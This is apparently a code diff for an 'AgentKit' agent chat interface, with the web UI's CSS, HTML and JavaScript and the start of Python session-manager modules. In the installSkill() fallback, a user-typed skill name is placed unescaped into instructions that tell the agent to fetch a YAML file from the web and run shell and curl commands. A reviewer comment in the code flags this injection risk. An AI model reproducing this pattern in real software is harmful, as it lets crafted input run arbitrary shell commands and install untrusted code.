.welcome{flex:1;display:flex;align-items:center;justify-content:center;flex-direction:column;gap:16px;color:var(--text2);padding:40px}
.welcome-icon{width:64px;height:64px;background:var(--primary-light);border-radius:var(--radius-xl);display:flex;align-items:center;justify-content:center;font-size:28px;margin-bottom:4px}
.welcome h2{color:var(--text);font-size:24px;font-weight:700;letter-spacing:-0.5px}
.welcome p{font-size:14px;max-width:380px;text-align:center;line-height:1.7;color:var(--text2)}
/* ── Right Sidebar ───────────────────────────────────────────── */
.right-sidebar{width:0;overflow:hidden;background:var(--surface);border-left:1px solid var(--border-light);display:flex;flex-direction:column;transition:width .3s cubic-bezier(.16,1,.3,1);flex-shrink:0}
.right-sidebar.open{width:var(--right-w)}
.right-sidebar-header{padding:16px 16px 12px;display:flex;align-items:center;justify-content:space-between}
.right-sidebar-header h2{font-size:15px;font-weight:700;letter-spacing:-0.2px}
.right-sidebar-content{flex:1;overflow-y:auto;padding:0}
/* ── Tabs ────────────────────────────────────────────────────── */
.tab-bar{display:flex;gap:2px;padding:0 12px;border-bottom:1px solid var(--border-light);background:var(--surface)}
.tab-btn{padding:10px 14px;font-size:12px;font-weight:600;color:var(--text3);background:none;border:none;border-bottom:2px solid transparent;cursor:pointer;transition:all .2s;text-align:center;letter-spacing:.2px;text-transform:uppercase}
.tab-btn:hover{color:var(--text2)}
.tab-btn.active{color:var(--primary);border-bottom-color:var(--primary)}
.tab-panel{display:none;padding:16px}
.tab-panel.active{display:block}
/* ── Skill Grid ──────────────────────────────────────────────── */
.skill-grid{display:grid;grid-template-columns:1fr 1fr;gap:10px}
.skill-card{background:var(--surface2);border:1px solid var(--border-light);border-radius:var(--radius);padding:14px;cursor:pointer;transition:all .2s cubic-bezier(.16,1,.3,1);position:relative}
.skill-card:hover{border-color:var(--primary-subtle);transform:translateY(-2px);box-shadow:var(--shadow-md);background:var(--surface)}
.skill-card .skill-name{font-size:13px;font-weight:600;margin-bottom:5px;white-space:nowrap;overflow:hidden;text-overflow:ellipsis;letter-spacing:-0.1px}
.skill-card .skill-desc{font-size:11px;color:var(--text2);line-height:1.5;display:-webkit-box;-webkit-line-clamp:2;-webkit-box-orient:vertical;overflow:hidden}
.skill-card .skill-tools{font-size:10px;color:var(--primary);margin-top:8px;white-space:nowrap;overflow:hidden;text-overflow:ellipsis;font-weight:500;letter-spacing:.2px}
.skill-card .skill-remove{position:absolute;top:8px;right:8px;width:22px;height:22px;border-radius:6px;background:var(--surface);border:1px solid var(--border);color:var(--text3);font-size:13px;cursor:pointer;display:none;align-items:center;justify-content:center;line-height:1;transition:all .15s}
.skill-card:hover .skill-remove{display:flex}
.skill-card .skill-remove:hover{background:var(--danger);color:#fff;border-color:var(--danger)}
/* ── Add Skill ───────────────────────────────────────────────── */
.add-skill-area{margin-top:16px;padding-top:16px;border-top:1px solid var(--border-light)}
.add-skill-label{font-size:12px;color:var(--text2);margin-bottom:8px;font-weight:500}
.add-skill-input{display:flex;gap:8px}
.add-skill-input input{flex:1;background:var(--surface2);border:1px solid var(--border);border-radius:var(--radius-sm);padding:9px 12px;font-size:13px;color:var(--text);outline:none;transition:all .2s;font-family:var(--font)}
.add-skill-input input:focus{border-color:var(--primary);box-shadow:0 0 0 3px rgba(59,91,219,.08)}
.add-skill-input input::placeholder{color:var(--text3)}
.btn-add-skill{background:var(--primary);color:#fff;border:none;border-radius:var(--radius-sm);padding:9px 16px;font-size:13px;font-weight:600;cursor:pointer;transition:all .2s;white-space:nowrap;font-family:var(--font)}
.btn-add-skill:hover{background:var(--primary-hover)}
.btn-add-skill:disabled{opacity:.4;cursor:not-allowed}
.install-status{font-size:11px;margin-top:8px;color:var(--text3);font-weight:500}
.install-status.success{color:var(--success)}
.install-status.error{color:var(--danger)}
/* ── Scrollbar ───────────────────────────────────────────────── */
::-webkit-scrollbar{width:5px}
::-webkit-scrollbar-track{background:transparent}
::-webkit-scrollbar-thumb{background:var(--border);border-radius:3px}
::-webkit-scrollbar-thumb:hover{background:var(--text3)}
/* ── Animations ──────────────────────────────────────────────── */
@keyframes msgIn{from{opacity:0;transform:translateY(8px)}to{opacity:1;transform:translateY(0)}}
@keyframes bounce{0%,80%,100%{transform:translateY(0)}40%{transform:translateY(-8px)}}
@keyframes fadeIn{from{opacity:0}to{opacity:1}}
@keyframes slideInRight{from{opacity:0;transform:translateX(12px)}to{opacity:1;transform:translateX(0)}}
/* ── Mobile ──────────────────────────────────────────────────── */
@media(max-width:768px){
.sidebar{position:fixed;left:-100%;z-index:10;transition:left .3s cubic-bezier(.16,1,.3,1);width:85vw;max-width:320px;box-shadow:var(--shadow-lg)}
.sidebar.open{left:0}
.sidebar-overlay{display:none;position:fixed;inset:0;background:rgba(0,0,0,.3);z-index:9;backdrop-filter:blur(2px)}
.sidebar-overlay.show{display:block}
.mobile-toggle{display:flex!important}
.right-sidebar.open{position:fixed;right:0;z-index:10;width:85vw;max-width:360px;box-shadow:var(--shadow-lg)}
.messages{padding:16px}
.input-area{padding:12px 16px 16px}
.msg{max-width:88%}
}
.mobile-toggle{display:none;align-items:center;justify-content:center;background:none;border:none;color:var(--text);font-size:20px;cursor:pointer;padding:4px}
</style>
</head>
<body>
<div class="app">
<!-- Left Sidebar -->
<div class="sidebar-overlay" id="overlay" onclick="toggleSidebar()"></div>
<aside class="sidebar" id="sidebar">
<div class="sidebar-header">
<div class="sidebar-brand">
<div class="sidebar-logo">A</div>
<h1>AgentKit</h1>
</div>
<button class="btn-new" onclick="createSession()" title="新建对话">+ 新对话</button>
</div>
<div class="session-list" id="sessionList"></div>
</aside>
<!-- Chat -->
<main class="chat-area" id="chatArea">
<div class="chat-header">
<button class="mobile-toggle" onclick="toggleSidebar()">&#9776;</button>
<span class="agent-name" id="agentName">AgentKit</span>
<span class="status" id="connStatus">未连接</span>
<button class="btn-icon" onclick="toggleRightSidebar()" title="技能与工具" id="rightSidebarBtn">&#9881;</button>
</div>
<div class="messages" id="messages">
<div class="welcome" id="welcome">
<div class="welcome-icon">🤖</div>
<h2>欢迎使用 AgentKit</h2>
<p>开始一段新对话,或从侧边栏选择已有会话。</p>
</div>
</div>
<div class="input-area">
<div class="input-wrap">
<textarea id="input" rows="1" placeholder="输入消息..." onkeydown="handleKey(event)" oninput="autoResize(this)"></textarea>
<button class="btn-send" id="sendBtn" onclick="sendMessage()">发送</button>
</div>
</div>
</main>
<!-- Right Sidebar -->
<aside class="right-sidebar" id="rightSidebar">
<div class="right-sidebar-header">
<h2>工具</h2>
<button class="btn-icon" onclick="toggleRightSidebar()" title="关闭" style="width:28px;height:28px;font-size:14px">&times;</button>
</div>
<div class="tab-bar">
<button class="tab-btn" onclick="switchTab('sources')" data-tab="sources">来源</button>
<button class="tab-btn active" onclick="switchTab('skills')" data-tab="skills">技能</button>
<button class="tab-btn" onclick="switchTab('templates')" data-tab="templates">模板</button>
</div>
<div class="right-sidebar-content">
<!-- Sources Tab -->
<div class="tab-panel" id="tab-sources">
<div class="empty-state" style="padding:20px">信息来源配置即将上线。</div>
</div>
<!-- Skills Tab -->
<div class="tab-panel active" id="tab-skills">
<div class="skill-grid" id="skillGrid"></div>
<div class="add-skill-area">
<div class="add-skill-label">安装新技能</div>
<div class="add-skill-input">
<input type="text" id="installSkillName" placeholder="技能名称..." onkeydown="if(event.key==='Enter')installSkill()" oninput="updateInstallBtn()">
<button class="btn-add-skill" id="installBtn" onclick="installSkill()" disabled>搜索</button>
</div>
<div class="install-status" id="installStatus"></div>
</div>
</div>
<!-- Templates Tab -->
<div class="tab-panel" id="tab-templates">
<div class="empty-state" style="padding:20px">输出模板配置即将上线。</div>
</div>
</div>
</aside>
</div>
<script>
// ── State ──────────────────────────────────────────────────────────────
// Cached list of session objects; filled by loadSessions() and updated on create/delete.
let sessions = [];
// session_id of the conversation currently shown, or null when none is selected.
let activeSessionId = null;
// WebSocket for the active session; null while disconnected.
let ws = null;
// True while an agent reply is pending or streaming; drives the send button's disabled state.
let isStreaming = false;
// Bubble element that incoming 'token' frames are appended to; null between replies.
let currentAgentBubble = null;
// Cached list of skills; filled by loadSkills().
let skills = [];
// Base paths of the REST endpoints used by this page.
const API = '/api/v1/chat';
const SKILLS_API = '/api/v1/skills';
// ── API helpers ────────────────────────────────────────────────
/**
 * Perform a JSON request against `base + path`.
 *
 * @param {string} base  Endpoint prefix (e.g. API or SKILLS_API).
 * @param {string} path  Path appended to the prefix.
 * @param {object} [opts]  Extra fetch options; `opts.headers` override the default header.
 * @returns {Promise<any>} Parsed JSON body, or null when the response has no body.
 * @throws {Error} When the response status is not OK (message carries status and body text).
 */
async function api(base, path, opts = {}) {
  const res = await fetch(base + path, {
    ...opts,
    headers: { 'Content-Type': 'application/json', ...opts.headers },
  });
  if (!res.ok) throw new Error(`API ${res.status}: ${await res.text()}`);
  // A successful response may legitimately be empty (e.g. 204 after DELETE);
  // calling res.json() on it would throw and be reported as a failure.
  if (res.status === 204) return null;
  const raw = await res.text();
  return raw ? JSON.parse(raw) : null;
}
// ── Sessions ───────────────────────────────────────────────────
/**
 * Fetch the session list, render it, and re-open the session remembered in
 * localStorage if it still exists. A failed fetch yields an empty list.
 */
async function loadSessions() {
  sessions = await api(API, '/sessions').catch(() => []);
  renderSessions();

  const rememberedId = localStorage.getItem('agentkit_active_session');
  if (!rememberedId) return;

  const stillExists = sessions.some((item) => item.session_id === rememberedId);
  if (stillExists) {
    await selectSession(rememberedId);
  }
}
/**
 * Render the session list in the left sidebar.
 *
 * Rows are built as DOM nodes with event listeners instead of an HTML string
 * with inline `onclick` code, so a session id is never interpreted as markup
 * or JavaScript.
 */
function renderSessions() {
  const listEl = document.getElementById('sessionList');
  if (!sessions.length) {
    listEl.innerHTML = '<div class="empty-state">暂无对话<br>点击 <b>+ 新对话</b> 开始</div>';
    return;
  }
  const today = new Date().toLocaleDateString();
  const fragment = document.createDocumentFragment();
  for (const s of sessions) {
    const created = new Date(s.created_at);
    // Show the time for sessions created today, otherwise a short date.
    const time = created.toLocaleDateString() === today
      ? created.toLocaleTimeString([], { hour: '2-digit', minute: '2-digit' })
      : created.toLocaleDateString([], { month: 'short', day: 'numeric' });
    const title = s.metadata?.title || `对话 ${s.session_id.slice(0, 6)}`;

    const row = document.createElement('div');
    row.className = s.session_id === activeSessionId ? 'session-item active' : 'session-item';
    row.addEventListener('click', () => selectSession(s.session_id));

    const titleEl = document.createElement('span');
    titleEl.className = 'title';
    titleEl.textContent = title;

    const timeEl = document.createElement('span');
    timeEl.className = 'time';
    timeEl.textContent = time;

    const delEl = document.createElement('span');
    delEl.className = 'del';
    delEl.title = '删除';
    delEl.textContent = '\u00d7';
    delEl.addEventListener('click', (event) => {
      // Do not let the click bubble up and select the row being deleted.
      event.stopPropagation();
      deleteSession(s.session_id);
    });

    row.append(titleEl, timeEl, delEl);
    fragment.appendChild(row);
  }
  listEl.innerHTML = '';
  listEl.appendChild(fragment);
}
/**
 * Create a new session for the 'default' agent, put it at the top of the
 * cached list and switch to it. Failures are logged to the console.
 */
async function createSession() {
  const payload = { agent_name: 'default', metadata: { title: '新对话' } };
  const request = { method: 'POST', body: JSON.stringify(payload) };
  try {
    const created = await api(API, '/sessions', request);
    sessions.unshift(created);
    // Not awaited: selection proceeds in the background.
    selectSession(created.session_id);
  } catch (err) {
    console.error('Create session failed:', err);
  }
}
/**
 * Delete a session on the server and drop it from the sidebar.
 *
 * When the deleted session is the active one, the socket is closed, any
 * pending-reply state is cleared and the message pane is reset to the
 * welcome screen.
 *
 * @param {string} id  session_id to delete.
 */
async function deleteSession(id) {
  try {
    await api(API, `/sessions/${encodeURIComponent(id)}`, { method: 'DELETE' });
    sessions = sessions.filter(s => s.session_id !== id);
    if (activeSessionId === id) {
      activeSessionId = null;
      localStorage.removeItem('agentkit_active_session');
      disconnectWs();
      // No further frames will arrive for this session: release the send button.
      currentAgentBubble = null;
      isStreaming = false;
      updateSendBtn();
      // renderHistory() removes #welcome once messages are shown, so merely
      // un-hiding it would leave the deleted conversation on screen. Rebuild
      // the pane instead.
      renderHistory([]);
    }
    renderSessions();
  } catch (e) {
    console.error('Delete session failed:', e);
  }
}
/**
 * Make `id` the active session: remember it, refresh the sidebar, load and
 * render its message history (an empty history on failure), then connect
 * the WebSocket.
 *
 * @param {string} id  session_id to activate.
 */
async function selectSession(id) {
  activeSessionId = id;
  localStorage.setItem('agentkit_active_session', id);
  renderSessions();
  showChat();

  await api(API, `/sessions/${id}/messages`)
    .then((history) => renderHistory(history))
    .catch(() => renderHistory([]));

  connectWs(id);
}
// ── WebSocket ──────────────────────────────────────────────────
/**
 * Open the WebSocket for `sessionId`, replacing any existing connection.
 *
 * Each handler first checks that its socket is still the current one. The
 * close event of a replaced socket fires asynchronously, after the new
 * socket has been stored in `ws`; without the check that late event would
 * reset `ws` to null and mark the fresh connection as disconnected.
 *
 * @param {string} sessionId  Session whose stream should be opened.
 */
function connectWs(sessionId) {
  disconnectWs();
  const proto = location.protocol === 'https:' ? 'wss:' : 'ws:';
  const url = `${proto}//${location.host}${API}/ws/${sessionId}`;
  const socket = new WebSocket(url);
  ws = socket;
  socket.onopen = () => {
    if (ws === socket) setConnStatus('已连接', true);
  };
  socket.onmessage = (e) => {
    if (ws !== socket) return;
    let frame;
    try {
      frame = JSON.parse(e.data);
    } catch (err) {
      // Ignore a malformed frame rather than throwing from the event handler.
      console.error('Invalid WebSocket frame:', err);
      return;
    }
    handleWsMessage(frame);
  };
  socket.onclose = () => {
    if (ws !== socket) return;
    setConnStatus('未连接', false);
    ws = null;
  };
  socket.onerror = () => {
    if (ws === socket) setConnStatus('连接错误', false);
  };
}
/** Close the current WebSocket, if any, and show the disconnected status. */
function disconnectWs() {
  ws?.close();
  ws = null;
  setConnStatus('未连接', false);
}
/**
 * Dispatch one parsed WebSocket frame by its `type`.
 *
 *  - connected:    mark the connection as established.
 *  - token:        append streamed text to the current agent bubble (created on demand).
 *  - final_answer: finish the reply; the final text replaces the streamed text
 *                  when the bubble is blank or the final text is longer.
 *  - step:         show a note for tool calls.
 *  - skill_match:  show which skill matched, with method and confidence.
 *  - error:        show the error and end the streaming state.
 * Frames of any other type are ignored.
 *
 * @param {object} msg  Parsed frame.
 */
function handleWsMessage(msg) {
  const kind = msg.type;

  if (kind === 'connected') {
    setConnStatus('已连接', true);
    return;
  }

  if (kind === 'token') {
    if (!currentAgentBubble) {
      currentAgentBubble = appendMessage('agent', '');
      isStreaming = true;
      updateSendBtn();
    }
    currentAgentBubble.textContent += msg.content || '';
    scrollToBottom();
    return;
  }

  if (kind === 'final_answer') {
    if (!currentAgentBubble) {
      appendMessage('agent', msg.content || '');
    } else {
      const shown = currentAgentBubble.textContent || '';
      const finalText = msg.content || '';
      const shouldReplace = !shown.trim() || finalText.length > shown.length;
      if (shouldReplace) {
        currentAgentBubble.textContent = finalText;
      }
      currentAgentBubble = null;
    }
    isStreaming = false;
    updateSendBtn();
    scrollToBottom();
    return;
  }

  if (kind === 'step') {
    if (msg.data?.event_type === 'tool_call') {
      appendStep(`使用工具: ${msg.data?.data?.tool_name || 'tool'}`);
    }
    return;
  }

  if (kind === 'skill_match') {
    if (msg.data?.skill) {
      const info = msg.data;
      const percent = Math.round((info.confidence || 0) * 100);
      appendStep(`技能: ${info.skill} (${info.method}, ${percent}%)`);
    }
    return;
  }

  if (kind === 'error') {
    appendMessage('agent', `[错误] ${msg.data?.message || '未知错误'}`);
    currentAgentBubble = null;
    isStreaming = false;
    updateSendBtn();
  }
}
// ── Send message ───────────────────────────────────────────────
/**
 * Send the text in the input box over the active WebSocket.
 *
 * When no session is active, one is created first (titled with the first 30
 * characters of the message) and the function waits for its socket to open.
 * The wait is bounded: it gives up when the socket closes or after a timeout,
 * instead of polling forever when the connection cannot be established. On
 * any failure the text is left in the input box so the user can retry.
 */
async function sendMessage() {
  const OPEN_TIMEOUT_MS = 10000;
  const POLL_INTERVAL_MS = 50;

  const input = document.getElementById('input');
  const text = input.value.trim();
  if (!text) return;
  // Auto-create session if none is active
  if (!activeSessionId) {
    try {
      const s = await api(API, '/sessions', {
        method: 'POST',
        body: JSON.stringify({ agent_name: 'default', metadata: { title: text.slice(0, 30) } }),
      });
      sessions.unshift(s);
      activeSessionId = s.session_id;
      localStorage.setItem('agentkit_active_session', s.session_id);
      renderSessions();
      showChat();
      renderHistory([]);
      connectWs(s.session_id);
      // Wait for WebSocket to open before sending
      await new Promise((resolve, reject) => {
        const deadline = Date.now() + OPEN_TIMEOUT_MS;
        const poll = () => {
          if (ws && ws.readyState === WebSocket.OPEN) {
            resolve();
            return;
          }
          // `ws` is reset to null when the socket closes, so a missing or
          // closing socket means the connection attempt has failed.
          const failed = !ws
            || ws.readyState === WebSocket.CLOSING
            || ws.readyState === WebSocket.CLOSED;
          if (failed || Date.now() >= deadline) {
            reject(new Error('WebSocket did not open'));
            return;
          }
          setTimeout(poll, POLL_INTERVAL_MS);
        };
        poll();
      });
    } catch (e) {
      console.error('Auto-create session failed:', e);
      return;
    }
  }
  if (!ws || ws.readyState !== WebSocket.OPEN) return;
  appendMessage('user', text);
  input.value = '';
  autoResize(input);
  ws.send(JSON.stringify({ type: 'message', content: text }));
  // The reply bubble is created lazily by the first 'token' frame.
  currentAgentBubble = null;
  isStreaming = true;
  updateSendBtn();
}
/**
 * Keydown handler for the message box: Enter sends, Shift+Enter inserts a
 * newline.
 *
 * Enter pressed while an input-method composition is in progress only
 * confirms the composed text and must not send the message. Some browsers
 * report that state through keyCode 229 rather than `isComposing`, so both
 * are checked.
 *
 * @param {KeyboardEvent} e
 */
function handleKey(e) {
  if (e.isComposing || e.keyCode === 229) return;
  if (e.key === 'Enter' && !e.shiftKey) {
    e.preventDefault();
    sendMessage();
  }
}
// ── UI helpers ─────────────────────────────────────────────────
/**
 * Append a chat message to the message pane and scroll to it.
 *
 * @param {string} role     'user', 'agent' or 'assistant' ('assistant' is styled as 'agent').
 * @param {string} content  Message text; inserted as plain text.
 * @returns {HTMLElement} The bubble element, so streamed tokens can be appended to it.
 */
function appendMessage(role, content) {
  hideWelcome();
  const pane = document.getElementById('messages');
  const kind = role === 'assistant' ? 'agent' : role;

  const bubble = Object.assign(document.createElement('div'), {
    className: 'bubble',
    textContent: content,
  });
  const meta = Object.assign(document.createElement('div'), {
    className: 'meta',
    textContent: kind === 'user' ? '你' : '智能体',
  });

  const row = document.createElement('div');
  row.className = `msg ${kind}`;
  row.appendChild(bubble);
  row.appendChild(meta);

  pane.appendChild(row);
  scrollToBottom();
  return bubble;
}
/**
 * Append a small, muted status line (tool call or skill match) to the
 * message pane and scroll to it.
 *
 * @param {string} text  Note to display; inserted as plain text.
 */
function appendStep(text) {
  hideWelcome();
  const pane = document.getElementById('messages');

  const note = document.createElement('div');
  note.className = 'bubble';
  note.style.cssText = 'opacity:.5;font-size:12px;font-style:italic;border:none;background:transparent;padding:4px 8px;box-shadow:none';
  note.textContent = text;

  const row = document.createElement('div');
  row.className = 'msg agent';
  row.appendChild(note);

  pane.appendChild(row);
  scrollToBottom();
}
/**
 * Replace the message pane with a stored conversation.
 *
 * An empty history shows the welcome screen. Only messages whose role is
 * 'user' or 'assistant' are rendered.
 *
 * @param {Array<{role: string, content: string}>} msgs
 */
function renderHistory(msgs) {
  const pane = document.getElementById('messages');
  pane.innerHTML = '';

  if (!msgs.length) {
    pane.innerHTML = '<div class="welcome" id="welcome"><div class="welcome-icon">🤖</div><h2>欢迎使用 AgentKit</h2><p>开始一段新对话,或从侧边栏选择已有会话。</p></div>';
    return;
  }

  for (const entry of msgs) {
    const shown = entry.role === 'user' || entry.role === 'assistant';
    if (!shown) continue;
    appendMessage(entry.role, entry.content);
  }
  scrollToBottom();
}
/** Un-hide the welcome panel, if it is currently in the document. */
function showWelcome() {
  const panel = document.getElementById('welcome');
  if (!panel) return;
  panel.style.display = 'flex';
}
/** Hide the welcome panel, if it is currently in the document. */
function hideWelcome() {
  const panel = document.getElementById('welcome');
  if (!panel) return;
  panel.style.display = 'none';
}
/** Switch to the chat view; currently this only hides the welcome panel. */
function showChat() {
  hideWelcome();
}
/**
 * Update the connection indicator in the chat header.
 *
 * @param {string} text        Label to display.
 * @param {boolean} connected  Truthy adds the 'connected' style.
 */
function setConnStatus(text, connected) {
  const badge = document.getElementById('connStatus');
  badge.textContent = text;
  badge.className = connected ? 'status connected' : 'status';
}
/** Disable the send button while a reply is streaming, enable it otherwise. */
function updateSendBtn() {
  const button = document.getElementById('sendBtn');
  button.disabled = isStreaming;
}
/** Scroll the message pane to its newest content. */
function scrollToBottom() {
  const pane = document.getElementById('messages');
  pane.scrollTop = pane.scrollHeight;
}
/**
 * Fit a textarea's height to its content, capped at 160px.
 *
 * @param {HTMLElement} el  Element to resize.
 */
function autoResize(el) {
  // Reset first so scrollHeight reflects the content, not the previous height.
  el.style.height = 'auto';
  const capped = Math.min(el.scrollHeight, 160);
  el.style.height = `${capped}px`;
}
/**
 * Escape a value for use as HTML text content, by writing it as text into a
 * detached element and reading back the serialized markup.
 *
 * @param {string} s  Raw text.
 * @returns {string} Markup-safe text.
 */
function esc(s) {
  const scratch = document.createElement('div');
  scratch.textContent = s;
  const escaped = scratch.innerHTML;
  return escaped;
}
/** Toggle the left sidebar together with its backdrop overlay. */
function toggleSidebar() {
  const toggles = [
    ['sidebar', 'open'],
    ['overlay', 'show'],
  ];
  for (const [elementId, cssClass] of toggles) {
    document.getElementById(elementId).classList.toggle(cssClass);
  }
}
// ── Right Sidebar ──────────────────────────────────────────────
/** Toggle the right sidebar; the skill list is reloaded each time it opens. */
function toggleRightSidebar() {
  const panel = document.getElementById('rightSidebar');
  const nowOpen = panel.classList.toggle('open');
  if (nowOpen) {
    loadSkills();
  }
}
/**
 * Activate one tab of the right sidebar and deactivate the others.
 *
 * @param {string} tabId  Tab key; matches a button's data-tab and the panel id "tab-<tabId>".
 */
function switchTab(tabId) {
  const panelId = `tab-${tabId}`;
  for (const button of document.querySelectorAll('.tab-btn')) {
    button.classList.toggle('active', button.dataset.tab === tabId);
  }
  for (const panel of document.querySelectorAll('.tab-panel')) {
    panel.classList.toggle('active', panel.id === panelId);
  }
}
// ── Skills ─────────────────────────────────────────────────────
/**
 * Fetch the skills from the skills API and render the grid. On any failure
 * the error is logged and an empty grid is rendered.
 */
async function loadSkills() {
  try {
    const fetched = await api(SKILLS_API, '');
    skills = fetched;
    renderSkillGrid();
  } catch (err) {
    console.error('Load skills failed:', err);
    skills = [];
    renderSkillGrid();
  }
}
/**
 * Render the skill cards in the right sidebar.
 *
 * Cards are built as DOM nodes with event listeners. Skill names are never
 * spliced into inline `onclick` code, where a quote in a name would break out
 * of the JavaScript string (HTML text escaping does not cover quotes).
 */
function renderSkillGrid() {
  const grid = document.getElementById('skillGrid');
  if (!skills.length) {
    grid.innerHTML = '<div class="empty-state" style="padding:20px;grid-column:1/-1">暂无已安装的技能。</div>';
    return;
  }
  const fragment = document.createDocumentFragment();
  for (const s of skills) {
    const desc = s.intent_description || s.description || '暂无描述';
    // Prefer bound_tools; fall back to tools; otherwise show no tool line.
    const tools = s.bound_tools && s.bound_tools.length
      ? s.bound_tools.join(', ')
      : (s.tools && s.tools.length ? s.tools.join(', ') : '');

    const card = document.createElement('div');
    card.className = 'skill-card';
    card.title = '点击使用此技能';
    card.addEventListener('click', () => useSkill(s.name));

    const removeBtn = document.createElement('button');
    removeBtn.type = 'button';
    removeBtn.className = 'skill-remove';
    removeBtn.title = '移除';
    removeBtn.textContent = '\u00d7';
    removeBtn.addEventListener('click', (event) => {
      // Keep the click from also triggering the card's "use skill" handler.
      event.stopPropagation();
      removeSkill(s.name);
    });

    const nameEl = document.createElement('div');
    nameEl.className = 'skill-name';
    nameEl.textContent = s.name;

    const descEl = document.createElement('div');
    descEl.className = 'skill-desc';
    descEl.textContent = desc;

    card.append(removeBtn, nameEl, descEl);
    if (tools) {
      const toolsEl = document.createElement('div');
      toolsEl.className = 'skill-tools';
      toolsEl.textContent = tools;
      card.appendChild(toolsEl);
    }
    fragment.appendChild(card);
  }
  grid.innerHTML = '';
  grid.appendChild(fragment);
}
/**
 * Prefix the message box with an "@skill:<name> " reference, unless the
 * skill is unknown or the reference is already present.
 *
 * @param {string} name  Skill name to reference.
 */
function useSkill(name) {
  const match = skills.find((candidate) => candidate.name === name);
  if (!match) return;

  const box = document.getElementById('input');
  const mention = `@skill:${name} `;
  if (box.value.includes(mention)) return;

  box.value = mention + box.value;
  box.focus();
  autoResize(box);
}
/** Enable the install button only when the skill-name input is non-blank. */
function updateInstallBtn() {
  const field = document.getElementById('installSkillName');
  const button = document.getElementById('installBtn');
  const isBlank = field.value.trim() === '';
  button.disabled = isBlank;
}
/**
 * Install the skill named in the input box through the skills API.
 *
 * On success the skill list is reloaded. On failure, and only when a
 * WebSocket is open, a request asking the agent to locate and install the
 * skill is sent as a chat message. When finished, the button's enabled state
 * is derived from the (cleared) input again rather than forced on, so it
 * stays consistent with updateInstallBtn().
 */
async function installSkill() {
  const nameInput = document.getElementById('installSkillName');
  const name = nameInput.value.trim();
  if (!name) return;
  // Clear input immediately to prevent re-triggering
  nameInput.value = '';
  updateInstallBtn();
  const btn = document.getElementById('installBtn');
  const status = document.getElementById('installStatus');
  btn.disabled = true;
  btn.textContent = '搜索中...';
  status.className = 'install-status';
  status.textContent = '正在搜索并安装...';
  try {
    const result = await api(SKILLS_API, '/install', {
      method: 'POST',
      body: JSON.stringify({ name }),
    });
    status.className = 'install-status success';
    status.textContent = `技能 "${result.name}" 安装成功!`;
    await loadSkills();
  } catch (e) {
    status.className = 'install-status error';
    status.textContent = `自动安装失败,正在请求智能体协助...`;
    if (ws && ws.readyState === WebSocket.OPEN) {
      // NOTE(review): `name` is user input embedded in a shell/curl instruction for the agent — confirm it is validated server-side.
      const installMsg = `请帮我安装一个名为"${name}"的技能。请按以下步骤操作1. 使用搜索工具在网上搜索 "${name}" 的 YAML 配置文件可在技能市场、GitHub 等平台搜索2. 如果找到了,使用 shell 工具将其下载到 configs/skills/${name}.yaml3. 下载完成后,使用 shell 工具执行 curl 命令调用 API 注册curl -X POST http://localhost:${location.port}/api/v1/skills/install -H 'Content-Type: application/json' -d '{"name":"${name}","source":"file://configs/skills/${name}.yaml"}'4. 如果找不到这个技能,请告诉我。`;
      appendMessage('user', installMsg);
      ws.send(JSON.stringify({ type: 'message', content: installMsg }));
      currentAgentBubble = null;
      isStreaming = true;
      updateSendBtn();
    }
  } finally {
    btn.textContent = '搜索';
    // The input was cleared above; enable the button only if the user has
    // typed a new name in the meantime.
    updateInstallBtn();
  }
}
/**
 * Ask for confirmation, then delete the skill through the skills API and
 * reload the grid. Failures are logged to the console.
 *
 * @param {string} name  Skill name to remove.
 */
async function removeSkill(name) {
  const confirmed = confirm(`确定移除技能 "${name}" 吗?`);
  if (!confirmed) return;

  const target = `/${encodeURIComponent(name)}`;
  try {
    await api(SKILLS_API, target, { method: 'DELETE' });
    await loadSkills();
  } catch (err) {
    console.error('Remove skill failed:', err);
  }
}
// ── Init ───────────────────────────────────────────────────────
loadSessions();
</script>
</body>
</html>

View File

@ -0,0 +1,16 @@
"""Session management - multi-turn conversation support for AgentKit."""
from agentkit.session.models import Message, MessageRole, Session, SessionStatus
from agentkit.session.manager import SessionManager
from agentkit.session.store import InMemorySessionStore, RedisSessionStore, create_session_store
# Public API of the session package: the names imported above from the
# models, manager and store submodules.
__all__ = [
"Message",
"MessageRole",
"Session",
"SessionStatus",
"SessionManager",
"InMemorySessionStore",
"RedisSessionStore",
"create_session_store",
]

View File

@ -0,0 +1,160 @@
"""SessionManager — high-level API for conversation session management."""
from __future__ import annotations
import logging
from typing import Any
from agentkit.session.models import Message, MessageRole, Session, SessionStatus
from agentkit.session.store import InMemorySessionStore, SessionStore
logger = logging.getLogger(__name__)
class SessionManager:
"""Manages conversation sessions and their messages.
Provides a high-level API for creating, querying, and updating
sessions, as well as appending and retrieving messages.
"""
def __init__(self, store: SessionStore | None = None):
self._store = store or InMemorySessionStore()
@property
def store(self) -> SessionStore:
return self._store
async def create_session(
    self,
    agent_name: str,
    metadata: dict[str, Any] | None = None,
) -> Session:
    """Create, persist and return a new session for an Agent.

    Args:
        agent_name: Name of the Agent the session is bound to.
        metadata: Optional metadata stored on the session; an empty dict
            is used when omitted or empty.

    Returns:
        The Session that was saved to the store.
    """
    new_id = Session.new_session_id()
    attached_metadata = metadata or {}
    session = Session(
        session_id=new_id,
        agent_name=agent_name,
        metadata=attached_metadata,
    )
    await self._store.save_session(session)
    logger.info(f"Session created: {session.session_id} for agent '{agent_name}'")
    return session
async def get_session(self, session_id: str) -> Session | None:
"""Get a session by ID."""
return await self._store.get_session(session_id)
async def pause_session(self, session_id: str) -> Session | None:
"""Pause an active session."""
return await self._store.update_session_status(session_id, SessionStatus.PAUSED)
async def resume_session(self, session_id: str) -> Session | None:
"""Resume a paused session."""
return await self._store.update_session_status(session_id, SessionStatus.ACTIVE)
async def close_session(self, session_id: str) -> Session | None:
"""Close a session. Closed sessions cannot accept new messages."""
return await self._store.update_session_status(session_id, SessionStatus.CLOSED)
async def delete_session(self, session_id: str) -> bool:
"""Delete a session and all its messages."""
return await self._store.delete_session(session_id)
async def list_sessions(
self,
agent_name: str | None = None,
limit: int = 100,
) -> list[Session]:
"""List sessions, optionally filtered by agent name."""
return await self._store.list_sessions(agent_name=agent_name, limit=limit)
async def append_message(
self,
session_id: str,
role: MessageRole,
content: str,
tool_call_id: str | None = None,
agent_name: str | None = None,
metadata: dict[str, Any] | None = None,
) -> Message:
"""Append a message to a session.
Args:
session_id: Target session ID.
role: Message role (user/assistant/tool/system).
content: Message content.
tool_call_id: Optional tool call ID for tool messages.
agent_name: Optional agent name for multi-Agent sessions.
metadata: Optional message metadata.
Returns:
The newly created Message.
